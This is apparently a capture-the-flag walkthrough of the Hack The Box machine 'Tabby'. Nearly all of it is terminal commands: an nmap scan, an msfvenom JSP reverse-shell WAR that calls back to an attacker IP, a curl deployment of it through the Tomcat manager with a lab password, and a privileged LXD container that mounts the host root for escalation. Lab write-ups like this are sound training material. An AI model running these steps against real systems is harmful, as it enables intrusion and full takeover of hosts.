Ahmed Samir

Nov 8, 2020

3 min read

Hackthebox — Tabby

Summary

Enumeration

Nmap

root@strike:~# nmap -sC -sV 10.10.10.194
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-23 21:01 EET
Nmap scan report for tabby.htb (10.10.10.194)
Host is up (0.083s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http Apache Tomcat
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.30 seconds
root@strike:~#

Web enum

root@strike:~# msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.22 LPORT=4242 -f WAR > fix.war
Payload size: 1086 bytes
Final size of war file: 1086 bytes

root@strike:~#
root@strike:~# curl --user 'tomcat:$3cureP4s5w0rd123!' --upload-file fix.war "http://megahosting.htb:8080/manager/text/deploy?path=/fix.war"
OK - Deployed application at context path [/fix.war]
root@strike:~#

Privilege Escalation

ash@tabby:~/temp$ lxc image import ./alpine-v3.12-x86_64-20200622_1441.tar.gz --alias bom
<lpine-v3.12-x86_64-20200622_1441.tar.gz --alias bom
ash@tabby:~/temp$ lxc init bom fox -c security.privileged=true
lxc init bom fox -c security.privileged=true
Creating fox
ash@tabby:~/temp$ lxc config device add fox mydevice disk source=/ path=/mnt/root recursive=true
<ydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to fox
ash@tabby:~/temp$ lxc start fox
lxc start fox
ash@tabby:~/temp$ lxc exec fox /bin/sh
lxc exec fox /bin/sh
~ # ls

THX for ur time!